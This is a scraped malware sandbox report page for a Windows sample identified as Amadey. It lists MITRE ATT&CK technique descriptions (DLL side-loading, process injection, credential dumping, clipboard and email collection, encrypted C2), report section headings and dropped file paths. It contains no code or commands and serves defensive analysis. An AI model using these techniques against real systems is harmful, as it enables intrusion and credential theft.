Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report J2NWKU2oJi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Auckland

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Conditions

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Japanese

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lessons

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Master

Windows Analysis Report
J2NWKU2oJi.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre